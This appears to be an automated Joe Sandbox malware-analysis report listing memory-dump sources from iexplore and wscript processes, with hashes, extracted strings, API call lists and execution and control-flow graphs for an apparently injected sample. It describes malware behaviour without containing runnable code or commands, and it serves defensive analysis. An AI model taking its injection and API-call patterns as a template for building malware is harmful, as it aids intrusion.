                                                                                                                                                                              • Opcode ID: cbaba81578802e6eaf8bd5dd683b8bccf454799406d93f30956e554f0bf949ef
                                                                                                                                                                              • Instruction ID: be2d407606837f1269d94fc6da4c07cde34421379d64f8d72250ceaf9151c395
                                                                                                                                                                              • Opcode Fuzzy Hash: cbaba81578802e6eaf8bd5dd683b8bccf454799406d93f30956e554f0bf949ef
                                                                                                                                                                              • Instruction Fuzzy Hash: 0E510835A203196FDF24EAA9DC95FEEB3BCAF44344F0401A9D505AB191D7B0AAC58F50
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                                              • String ID: +$-$0$0
                                                                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                              • Instruction ID: 567e1f4c075c75283a4ad1cfa9192390a832ee389863b7b6fb41c29169243ddb
                                                                                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                              • Instruction Fuzzy Hash: 4A81BC35E752CA9ADF24CE68C8927AEBBA5AF45310F2C435DD861A73D0C77488C0CB50
                                                                                                                                                                              Strings
                                                                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032F02E7
                                                                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032F02BD
                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 032F031E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                              • API String ID: 0-2474120054
                                                                                                                                                                              • Opcode ID: e87de6b73ea166b02166f4920dc1b09723bc7b4f2068269bf66b320efda3438a
                                                                                                                                                                              • Instruction ID: 58efd630fb05af1bcc32f007bc3083ea86c563cf8b67fb8e5904b8840e58c522
                                                                                                                                                                              • Opcode Fuzzy Hash: e87de6b73ea166b02166f4920dc1b09723bc7b4f2068269bf66b320efda3438a
                                                                                                                                                                              • Instruction Fuzzy Hash: 73E1C030624B42AFD725CF28CD84B2AF7E4BB44714F184A6DF5A58B2D1D778D884CB52
                                                                                                                                                                              Strings
                                                                                                                                                                              • RTL: Resource at %p, xrefs: 032F7B8E
                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 032F7BAC
                                                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 032F7B7F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                              • API String ID: 0-871070163
                                                                                                                                                                              • Opcode ID: e34f0187caa2aee5f5d1d48eefa5a90ab332c38c52bafe65bd98494eb1d5a801
                                                                                                                                                                              • Instruction ID: e4d12beaf6702569a057715d086c66316c60b022cf465df8a7f599d841dceebb
                                                                                                                                                                              • Opcode Fuzzy Hash: e34f0187caa2aee5f5d1d48eefa5a90ab332c38c52bafe65bd98494eb1d5a801
                                                                                                                                                                              • Instruction Fuzzy Hash: 3A4102357247039FD724CE29C840BAAB7E5EF89750F040A2DF95ADB680DB71E485CB91
                                                                                                                                                                              APIs
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 032F728C
                                                                                                                                                                              Strings
                                                                                                                                                                              • RTL: Resource at %p, xrefs: 032F72A3
                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 032F72C1
                                                                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 032F7294
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                                                                              • Opcode ID: 3a571170e8b36855ca0a7ad94501eeb0b652649bb0c284d9e72d8d6ee9764457
                                                                                                                                                                              • Instruction ID: 7226b7e9b6c73ea47a823989dd11242f212c42bb4f3433d4ecceb7bf7599888e
                                                                                                                                                                              • Opcode Fuzzy Hash: 3a571170e8b36855ca0a7ad94501eeb0b652649bb0c284d9e72d8d6ee9764457
                                                                                                                                                                              • Instruction Fuzzy Hash: 5041D035620306AFD720DE29CC91FAAF7B5FF44750F140629F955AB280DB71E89287D1
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                                              • String ID: +$-
                                                                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                              • Instruction ID: e433928fb85c575db7e46b6696d397f4e021218ed7b05b832585b09b1fae339b
                                                                                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                              • Instruction Fuzzy Hash: 5F91A071E3029A9EDB24DE6DC8906BEB7A5BF44320F18875EE865A72C0D77089C18F50
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $$@
                                                                                                                                                                              • API String ID: 0-1194432280
                                                                                                                                                                              • Opcode ID: eb4e7de90207b2a2ded5fb3b2f0221026bf530ae155b410f37b8dc976d0e8b92
                                                                                                                                                                              • Instruction ID: e92c06eeea0575e571cff4ecb5fedd3fe6d3ee8e4ee0d54ef06be1877df612c0
                                                                                                                                                                              • Opcode Fuzzy Hash: eb4e7de90207b2a2ded5fb3b2f0221026bf530ae155b410f37b8dc976d0e8b92
                                                                                                                                                                              • Instruction Fuzzy Hash: 07814875D10269DBDB31DB54CC45BEEB7B8AB08710F0445EAA91AB7280E7709EC0CFA0

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:3%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:4%
                                                                                                                                                                              Signature Coverage:2%
                                                                                                                                                                              Total number of Nodes:504
                                                                                                                                                                              Total number of Limit Nodes:77
                                                                                                                                                                              execution_graph 86433 4932ad0 LdrInitializeThunk 85911 362430 85916 378cf0 85911->85916 85915 36247b 85917 378d0a 85916->85917 85925 4932c0a 85917->85925 85918 362466 85920 379780 85918->85920 85921 37980f 85920->85921 85923 3797ab 85920->85923 85928 4932e80 LdrInitializeThunk 85921->85928 85922 379840 85922->85915 85923->85915 85926 4932c1f LdrInitializeThunk 85925->85926 85927 4932c11 85925->85927 85926->85918 85927->85918 85928->85922 85929 3674b0 85930 367522 85929->85930 85931 3674c8 85929->85931 85931->85930 85933 36b430 85931->85933 85934 36b456 85933->85934 85935 36b689 85934->85935 85960 379ae0 85934->85960 85935->85930 85937 36b4cc 85937->85935 85963 37c9a0 85937->85963 85939 36b4eb 85939->85935 85940 36b5c2 85939->85940 85941 378cf0 LdrInitializeThunk 85939->85941 85942 365cd0 LdrInitializeThunk 85940->85942 85944 36b5e1 85940->85944 85943 36b54d 85941->85943 85942->85944 85943->85940 85947 36b556 85943->85947 85948 36b671 85944->85948 85977 378860 85944->85977 85945 36b5aa 85973 368290 85945->85973 85946 36b588 85992 374970 LdrInitializeThunk 85946->85992 85947->85935 85947->85945 85947->85946 85969 365cd0 85947->85969 85954 368290 LdrInitializeThunk 85948->85954 85955 36b67f 85954->85955 85955->85930 85956 36b648 85982 378910 85956->85982 85958 36b662 85987 378a70 85958->85987 85961 379afa 85960->85961 85962 379b0b CreateProcessInternalW 85961->85962 85962->85937 85964 37c910 85963->85964 85965 37c96d 85964->85965 85993 37b8b0 85964->85993 85965->85939 85967 37c94a 85996 37b7d0 85967->85996 85970 365cdd 85969->85970 86005 378ec0 85970->86005 85972 365d0e 85972->85946 85974 3682a3 85973->85974 86011 378bf0 85974->86011 85976 3682ce 85976->85930 85978 3788dd 85977->85978 85980 37888b 85977->85980 86017 49339b0 LdrInitializeThunk 85978->86017 85979 378902 85979->85956 85980->85956 85983 378990 85982->85983 85985 37893e 85982->85985 86018 4934340 LdrInitializeThunk 85983->86018 85984 3789b5 85984->85958 85985->85958 85988 378aed 85987->85988 85989 378a9b 85987->85989 86019 4932fb0 LdrInitializeThunk 85988->86019 85989->85948 85990 378b12 85990->85948 85992->85945 85999 379a00 85993->85999 85995 37b8cb 85995->85967 86002 379a50 85996->86002 85998 37b7e9 85998->85965 86000 379a1a 85999->86000 86001 379a2b RtlAllocateHeap 86000->86001 86001->85995 86003 379a6a 86002->86003 86004 379a7b RtlFreeHeap 86003->86004 86004->85998 86006 378f74 86005->86006 86008 378ef2 86005->86008 86010 4932d10 LdrInitializeThunk 86006->86010 86007 378fb9 86007->85972 86008->85972 86010->86007 86012 378c71 86011->86012 86014 378c1e 86011->86014 86016 4932dd0 LdrInitializeThunk 86012->86016 86013 378c96 86013->85976 86014->85976 86016->86013 86017->85979 86018->85984 86019->85990 86020 366f30 86021 366f5a 86020->86021 86024 3680c0 86021->86024 86023 366f84 86025 3680dd 86024->86025 86031 378de0 86025->86031 86027 36812d 86028 368134 86027->86028 86029 378ec0 LdrInitializeThunk 86027->86029 86028->86023 86030 36815d 86029->86030 86030->86023 86032 378e7b 86031->86032 86033 378e0b 86031->86033 86036 4932f30 LdrInitializeThunk 86032->86036 86033->86027 86034 378eb4 86034->86027 86036->86034 86037 379630 86038 3796aa 86037->86038 86040 37965e 86037->86040 86039 3796c0 NtDeleteFile 86038->86039 86041 379530 86042 3795da 86041->86042 86044 37955e 86041->86044 86043 3795f0 NtReadFile 86042->86043 86434 371cf0 86435 371d09 86434->86435 86436 371d51 86435->86436 86439 371d94 86435->86439 86441 371d99 86435->86441 86437 37b7d0 RtlFreeHeap 86436->86437 86438 371d61 86437->86438 86440 37b7d0 RtlFreeHeap 86439->86440 86440->86441 86045 3632a3 86050 367f10 86045->86050 86049 3632cf 86051 367f2a 86050->86051 86055 3632b3 86050->86055 86059 378d90 86051->86059 86054 3796e0 NtClose 86054->86055 86055->86049 86056 3796e0 86055->86056 86057 3796fd 86056->86057 86058 37970e NtClose 86057->86058 86058->86049 86060 378daa 86059->86060 86063 49335c0 LdrInitializeThunk 86060->86063 86061 367ffa 86061->86054 86063->86061 86064 359f20 86065 35a19b 86064->86065 86067 35a4d3 86065->86067 86068 37b430 86065->86068 86069 37b456 86068->86069 86074 354140 86069->86074 86071 37b462 86072 37b49b 86071->86072 86077 3757f0 86071->86077 86072->86067 86081 3633b0 86074->86081 86076 35414d 86076->86071 86078 375851 86077->86078 86079 37585e 86078->86079 86092 361b60 86078->86092 86079->86072 86082 3633cd 86081->86082 86084 3633e6 86082->86084 86085 37a140 86082->86085 86084->86076 86087 37a15a 86085->86087 86086 37a189 86086->86084 86087->86086 86088 378cf0 LdrInitializeThunk 86087->86088 86089 37a1e9 86088->86089 86090 37b7d0 RtlFreeHeap 86089->86090 86091 37a202 86090->86091 86091->86084 86093 361b9b 86092->86093 86108 368020 86093->86108 86095 361ba3 86096 361e83 86095->86096 86097 37b8b0 RtlAllocateHeap 86095->86097 86096->86079 86098 361bb9 86097->86098 86099 37b8b0 RtlAllocateHeap 86098->86099 86100 361bca 86099->86100 86101 37b8b0 RtlAllocateHeap 86100->86101 86102 361bdb 86101->86102 86107 361c72 86102->86107 86119 366bc0 86102->86119 86105 361e32 86146 378130 86105->86146 86142 3646f0 86107->86142 86109 36804c 86108->86109 86110 367f10 2 API calls 86109->86110 86111 36806f 86110->86111 86112 368091 86111->86112 86113 368079 86111->86113 86115 3680ad 86112->86115 86117 3796e0 NtClose 86112->86117 86114 368084 86113->86114 86116 3796e0 NtClose 86113->86116 86114->86095 86115->86095 86116->86114 86118 3680a3 86117->86118 86118->86095 86120 366be5 86119->86120 86123 366c19 86120->86123 86165 366460 86120->86165 86122 366d36 86122->86107 86123->86122 86150 3666f0 86123->86150 86125 366caf 86126 366cba 86125->86126 86172 366570 86125->86172 86126->86107 86129 3666f0 3 API calls 86131 366e38 86129->86131 86130 3796e0 NtClose 86135 366d82 86130->86135 86134 366e3f 86131->86134 86176 3668c0 86131->86176 86133 366e7c 86133->86107 86134->86107 86136 366570 LdrInitializeThunk 86135->86136 86137 366dcd 86136->86137 86138 3796e0 NtClose 86137->86138 86139 366dd7 86138->86139 86140 366570 LdrInitializeThunk 86139->86140 86141 366e22 86140->86141 86141->86129 86143 364714 86142->86143 86144 36471b 86143->86144 86145 364750 LdrLoadDll 86143->86145 86144->86105 86145->86144 86147 378192 86146->86147 86149 37819f 86147->86149 86226 361ea0 86147->86226 86149->86096 86151 36671c 86150->86151 86152 366570 LdrInitializeThunk 86151->86152 86153 366766 86152->86153 86154 366808 86153->86154 86202 379170 86153->86202 86154->86125 86156 3667ff 86157 3796e0 NtClose 86156->86157 86157->86154 86158 36678d 86158->86156 86159 366814 86158->86159 86160 379170 LdrInitializeThunk 86158->86160 86161 3796e0 NtClose 86159->86161 86160->86158 86162 36681d 86161->86162 86163 366570 LdrInitializeThunk 86162->86163 86164 36683a 86162->86164 86163->86164 86164->86125 86166 366493 86165->86166 86167 3664b7 86166->86167 86207 379220 86166->86207 86167->86123 86169 3664da 86169->86167 86170 3796e0 NtClose 86169->86170 86171 36655a 86170->86171 86171->86123 86173 366595 86172->86173 86212 379010 86173->86212 86177 3668e5 86176->86177 86178 366460 2 API calls 86177->86178 86179 366915 86177->86179 86178->86179 86181 366570 LdrInitializeThunk 86179->86181 86188 366b18 86179->86188 86190 366bb1 86179->86190 86180 366570 LdrInitializeThunk 86182 366b66 86180->86182 86183 366a41 86181->86183 86217 366620 86182->86217 86184 366a4c 86183->86184 86183->86188 86186 3796e0 NtClose 86184->86186 86191 366a56 86186->86191 86187 3796e0 NtClose 86187->86190 86188->86180 86189 366b76 86189->86187 86190->86133 86192 366570 LdrInitializeThunk 86191->86192 86193 366aa1 86192->86193 86194 3796e0 NtClose 86193->86194 86195 366aab 86194->86195 86196 366570 LdrInitializeThunk 86195->86196 86197 366af6 86196->86197 86198 366620 LdrInitializeThunk 86197->86198 86199 366b06 86198->86199 86200 3796e0 NtClose 86199->86200 86201 366b10 86200->86201 86201->86133 86203 37918d 86202->86203 86206 4932ba0 LdrInitializeThunk 86203->86206 86204 3791bd 86204->86158 86206->86204 86208 37923d 86207->86208 86211 4932ca0 LdrInitializeThunk 86208->86211 86209 379269 86209->86169 86211->86209 86213 37902d 86212->86213 86216 4932c60 LdrInitializeThunk 86213->86216 86214 366609 86214->86130 86214->86141 86216->86214 86219 366646 86217->86219 86221 379070 86219->86221 86222 37908d 86221->86222 86225 4933090 LdrInitializeThunk 86222->86225 86223 3666d4 86223->86189 86225->86223 86244 3682f0 86226->86244 86228 36241a 86228->86149 86229 361ec0 86229->86228 86248 371320 86229->86248 86232 3620da 86234 37c9a0 2 API calls 86232->86234 86233 361f1e 86233->86228 86251 37c870 86233->86251 86237 3620ef 86234->86237 86235 368290 LdrInitializeThunk 86239 36213c 86235->86239 86236 375a60 LdrInitializeThunk 86236->86239 86237->86239 86256 3609b0 86237->86256 86239->86228 86239->86235 86239->86236 86241 3609b0 LdrInitializeThunk 86239->86241 86240 368290 LdrInitializeThunk 86243 362293 86240->86243 86241->86239 86243->86239 86243->86240 86259 375a60 86243->86259 86245 3682fd 86244->86245 86246 368325 86245->86246 86247 36831e SetErrorMode 86245->86247 86246->86229 86247->86246 86263 37b740 86248->86263 86250 371341 86250->86233 86252 37c886 86251->86252 86253 37c880 86251->86253 86254 37b8b0 RtlAllocateHeap 86252->86254 86253->86232 86255 37c8ac 86254->86255 86255->86232 86270 379970 86256->86270 86260 375ac2 86259->86260 86262 375ad3 86260->86262 86275 367a40 86260->86275 86262->86243 86266 379850 86263->86266 86265 37b771 86265->86250 86267 3798e5 86266->86267 86269 37987b 86266->86269 86268 3798fb NtAllocateVirtualMemory 86267->86268 86268->86265 86269->86265 86271 37998d 86270->86271 86274 4932c70 LdrInitializeThunk 86271->86274 86272 3609d2 86272->86243 86274->86272 86276 367a11 86275->86276 86277 367a74 86276->86277 86278 3609b0 LdrInitializeThunk 86276->86278 86277->86262 86279 367a31 86278->86279 86279->86262 86442 35b660 86443 37b740 NtAllocateVirtualMemory 86442->86443 86444 35ccd1 86443->86444 86280 36c7a0 86282 36c7c9 86280->86282 86281 36c8cd 86282->86281 86283 36c873 FindFirstFileW 86282->86283 86283->86281 86285 36c88e 86283->86285 86284 36c8b4 FindNextFileW 86284->86285 86286 36c8c6 FindClose 86284->86286 86285->86284 86286->86281 86287 378ca0 86288 378cbd 86287->86288 86291 4932df0 LdrInitializeThunk 86288->86291 86289 378ce5 86291->86289 86292 378b20 86293 378bb2 86292->86293 86294 378b4e 86292->86294 86297 4932ee0 LdrInitializeThunk 86293->86297 86295 378be3 86297->86295 86445 376260 86446 3762ba 86445->86446 86447 3762c7 86446->86447 86449 373c70 86446->86449 86450 37b740 NtAllocateVirtualMemory 86449->86450 86452 373cb1 86450->86452 86451 373dbe 86451->86447 86452->86451 86453 3646f0 LdrLoadDll 86452->86453 86454 373cf7 86453->86454 86454->86451 86455 373d40 Sleep 86454->86455 86455->86454 86456 371960 86457 37197c 86456->86457 86458 3719a4 86457->86458 86459 3719b8 86457->86459 86460 3796e0 NtClose 86458->86460 86461 3796e0 NtClose 86459->86461 86462 3719ad 86460->86462 86463 3719c1 86461->86463 86466 37b8f0 RtlAllocateHeap 86463->86466 86465 3719cc 86466->86465 86468 3672d0 86469 3672ec 86468->86469 86472 36733f 86468->86472 86471 3796e0 NtClose 86469->86471 86469->86472 86470 367477 86473 367307 86471->86473 86472->86470 86474 3666f0 3 API calls 86472->86474 86476 3666f0 3 API calls 86473->86476 86475 367451 86474->86475 86475->86470 86477 3668c0 4 API calls 86475->86477 86476->86472 86477->86470 86478 365d50 86479 368290 LdrInitializeThunk 86478->86479 86480 365d80 86479->86480 86482 365dac 86480->86482 86483 368210 86480->86483 86484 368254 86483->86484 86485 368275 86484->86485 86490 3789c0 86484->86490 86485->86480 86487 368265 86488 368281 86487->86488 86489 3796e0 NtClose 86487->86489 86488->86480 86489->86485 86491 378a40 86490->86491 86493 3789ee 86490->86493 86495 4934650 LdrInitializeThunk 86491->86495 86492 378a65 86492->86487 86493->86487 86495->86492 86496 37c8d0 86497 37b7d0 RtlFreeHeap 86496->86497 86498 37c8e5 86497->86498 86511 359ec0 86513 359ecf 86511->86513 86512 359f10 86513->86512 86514 359efd CreateThread 86513->86514 86298 36fa00 86299 36fa64 86298->86299 86300 366460 2 API calls 86299->86300 86302 36fb97 86300->86302 86301 36fb9e 86302->86301 86303 366570 LdrInitializeThunk 86302->86303 86305 36fc1a 86303->86305 86304 36fd43 86305->86304 86306 36fd52 86305->86306 86327 36f7e0 86305->86327 86307 3796e0 NtClose 86306->86307 86309 36fd5c 86307->86309 86310 36fc56 86310->86306 86311 36fc61 86310->86311 86312 37b8b0 RtlAllocateHeap 86311->86312 86313 36fc8a 86312->86313 86314 36fc93 86313->86314 86315 36fca9 86313->86315 86316 3796e0 NtClose 86314->86316 86336 36f6d0 CoInitialize 86315->86336 86318 36fc9d 86316->86318 86319 36fcb7 86320 379170 LdrInitializeThunk 86319->86320 86325 36fcd5 86320->86325 86321 36fd32 86322 3796e0 NtClose 86321->86322 86323 36fd3c 86322->86323 86324 37b7d0 RtlFreeHeap 86323->86324 86324->86304 86325->86321 86326 379170 LdrInitializeThunk 86325->86326 86326->86325 86328 36f7fc 86327->86328 86329 3646f0 LdrLoadDll 86328->86329 86331 36f81a 86329->86331 86330 36f823 86330->86310 86331->86330 86332 3646f0 LdrLoadDll 86331->86332 86333 36f8ee 86332->86333 86334 3646f0 LdrLoadDll 86333->86334 86335 36f948 86333->86335 86334->86335 86335->86310 86338 36f735 86336->86338 86337 36f7cb CoUninitialize 86337->86319 86338->86337 86339 36af00 86344 36ac00 86339->86344 86341 36af0d 86358 36a870 86341->86358 86343 36af29 86345 36ac25 86344->86345 86369 368500 86345->86369 86348 36ad73 86348->86341 86350 36ad8a 86350->86341 86351 36ad81 86351->86350 86353 36ae78 86351->86353 86388 36a2c0 86351->86388 86355 36aedd 86353->86355 86397 36a630 86353->86397 86356 37b7d0 RtlFreeHeap 86355->86356 86357 36aee4 86356->86357 86357->86341 86359 36a886 86358->86359 86366 36a891 86358->86366 86360 37b8b0 RtlAllocateHeap 86359->86360 86360->86366 86361 36a8b8 86361->86343 86362 368500 GetFileAttributesW 86362->86366 86363 36abd5 86364 36abee 86363->86364 86365 37b7d0 RtlFreeHeap 86363->86365 86364->86343 86365->86364 86366->86361 86366->86362 86366->86363 86367 36a2c0 RtlFreeHeap 86366->86367 86368 36a630 RtlFreeHeap 86366->86368 86367->86366 86368->86366 86370 368521 86369->86370 86371 368533 86370->86371 86372 368528 GetFileAttributesW 86370->86372 86371->86348 86373 373540 86371->86373 86372->86371 86374 37354e 86373->86374 86375 373555 86373->86375 86374->86351 86376 3646f0 LdrLoadDll 86375->86376 86377 37358a 86376->86377 86380 373599 86377->86380 86401 373000 LdrLoadDll 86377->86401 86379 37b8b0 RtlAllocateHeap 86381 3735b2 86379->86381 86380->86379 86384 373744 86380->86384 86382 37373a 86381->86382 86381->86384 86385 3735ce 86381->86385 86383 37b7d0 RtlFreeHeap 86382->86383 86382->86384 86383->86384 86384->86351 86385->86384 86386 37b7d0 RtlFreeHeap 86385->86386 86387 37372e 86386->86387 86387->86351 86389 36a2e6 86388->86389 86402 36dd20 86389->86402 86391 36a358 86393 36a4e0 86391->86393 86394 36a376 86391->86394 86392 36a4c5 86392->86351 86393->86392 86395 36a180 RtlFreeHeap 86393->86395 86394->86392 86407 36a180 86394->86407 86395->86393 86398 36a656 86397->86398 86399 36dd20 RtlFreeHeap 86398->86399 86400 36a6dd 86399->86400 86400->86353 86401->86380 86404 36dd44 86402->86404 86403 36dd51 86403->86391 86404->86403 86405 37b7d0 RtlFreeHeap 86404->86405 86406 36dd94 86405->86406 86406->86391 86408 36a19d 86407->86408 86411 36ddb0 86408->86411 86410 36a2a3 86410->86394 86413 36ddd4 86411->86413 86412 36de7e 86412->86410 86413->86412 86414 37b7d0 RtlFreeHeap 86413->86414 86414->86412 86415 368980 86416 368985 86415->86416 86417 368971 86415->86417 86416->86417 86419 367250 86416->86419 86420 367266 86419->86420 86422 36729f 86419->86422 86420->86422 86423 3670c0 LdrLoadDll 86420->86423 86422->86417 86423->86422 86424 370300 86425 370323 86424->86425 86426 3646f0 LdrLoadDll 86425->86426 86427 370347 86426->86427 86515 3793c0 86516 37947a 86515->86516 86517 3793f2 86515->86517 86518 379490 NtCreateFile 86516->86518 86428 360f8b PostThreadMessageW 86429 360f9d 86428->86429 86524 369dcb 86525 369dd1 86524->86525 86526 369dfd 86525->86526 86527 37b7d0 RtlFreeHeap 86525->86527 86527->86526 86430 362908 86431 366460 2 API calls 86430->86431 86432 362933 86431->86432

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 27 359f20-35a191 28 35a19b-35a1a5 27->28 29 35a1a7-35a1c2 28->29 30 35a1de-35a1ef 28->30 32 35a1c4-35a1c8 29->32 33 35a1c9-35a1cb 29->33 31 35a200-35a20c 30->31 34 35a223 31->34 35 35a20e-35a221 31->35 32->33 36 35a1cd-35a1d6 33->36 37 35a1dc 33->37 39 35a22a-35a231 34->39 35->31 36->37 37->28 40 35a233-35a250 39->40 41 35a252-35a259 39->41 40->39 42 35a280 41->42 43 35a25b-35a27e 41->43 44 35a287-35a290 42->44 43->41 45 35a296-35a2a3 44->45 46 35a460-35a467 44->46 45->45 47 35a2a5-35a2a9 45->47 48 35a46d-35a474 46->48 49 35a56f-35a573 46->49 53 35a2d7-35a2da 47->53 54 35a2ab-35a2d5 47->54 50 35a47f-35a486 48->50 51 35a575-35a59a 49->51 52 35a59c-35a5a6 49->52 55 35a4ce call 37b430 50->55 56 35a488-35a4cc 50->56 51->49 57 35a5b7-35a5c1 52->57 58 35a2e0-35a2e4 53->58 54->47 67 35a4d3-35a4dd 55->67 64 35a476-35a47c 56->64 59 35a5f5-35a5ff 57->59 60 35a5c3-35a5f3 57->60 62 35a2e6-35a2fd 58->62 63 35a2ff-35a30b 58->63 60->57 62->58 65 35a330-35a33f 63->65 66 35a30d-35a32e 63->66 64->50 70 35a346-35a350 65->70 71 35a341 65->71 66->63 69 35a4ee-35a4fa 67->69 72 35a507-35a511 69->72 73 35a4fc-35a505 69->73 74 35a361-35a36d 70->74 71->46 75 35a522-35a52b 72->75 73->69 77 35a383-35a397 74->77 78 35a36f-35a381 74->78 79 35a543-35a547 75->79 80 35a52d-35a536 75->80 81 35a3a8-35a3b4 77->81 78->74 79->49 85 35a549-35a56d 79->85 83 35a541 80->83 84 35a538-35a53b 80->84 86 35a3c4-35a3ce 81->86 87 35a3b6-35a3c2 81->87 83->75 84->83 85->79 89 35a3df-35a3e8 86->89 87->81 91 35a3f8-35a3fc 89->91 92 35a3ea-35a3f6 89->92 93 35a3fe-35a405 91->93 94 35a408-35a40f 91->94 92->89 93->94 96 35a411-35a431 94->96 97 35a45b 94->97 98 35a433-35a437 96->98 99 35a438-35a43a 96->99 97->44 98->99 100 35a445-35a459 99->100 101 35a43c-35a442 99->101 100->94 101->100
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: s$ $%$+i$._$7$;w$<$$B$C^$C^K?$I}$K?$M$N$P$Q|K?C^$TN$c$ox$zs$~h$x
                                                                                                                                                                              • API String ID: 0-2531995965
                                                                                                                                                                              • Opcode ID: 3161732efd6fe289b85b6be9f3dda6b8f5280edbe91bf05dc45768a539010ced
                                                                                                                                                                              • Instruction ID: 70df6abe8b6068d61c441fd8acf726b965a451b8fc96f58a39b68db8e48b044b
                                                                                                                                                                              • Opcode Fuzzy Hash: 3161732efd6fe289b85b6be9f3dda6b8f5280edbe91bf05dc45768a539010ced
                                                                                                                                                                              • Instruction Fuzzy Hash: 5B12F0B0D04628CBDB25CF98C895BEDBBB1BB45309F2081D9D40DAB391C7B45A89EF41
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 0036C884
                                                                                                                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 0036C8BF
                                                                                                                                                                              • FindClose.KERNELBASE(?), ref: 0036C8CA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3541575487-0
